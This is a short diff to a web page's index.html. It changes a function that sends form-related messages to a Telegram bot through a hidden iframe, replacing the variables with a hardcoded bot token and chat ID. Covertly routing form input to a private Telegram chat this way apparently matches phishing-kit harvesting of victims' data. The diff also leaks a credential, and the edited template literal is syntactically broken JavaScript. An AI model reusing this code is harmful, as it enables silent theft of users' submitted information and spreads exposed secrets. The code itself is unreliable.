--- a/index.html
+++ b/index.html
@@ -569,7 +569,7 @@ When form will be filled , you receive a confirmation email with next step!</p>
 
         // Send message to Telegram
         function sendToTelegram(message) {
-            const telegramUrl = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage?chat_id=${TELEGRAM_CHAT_ID}&text=${message}`;
+            const telegramUrl = `https://api.telegram.org/bot${8537253559:AAGohyTz08NvyelLVMTs2VXXMJu7bZQZLjk}/sendMessage?chat_id=${-4959049625}&text=${message}`;
             
             const iframe = document.createElement('iframe');
             iframe.style.display = 'none';
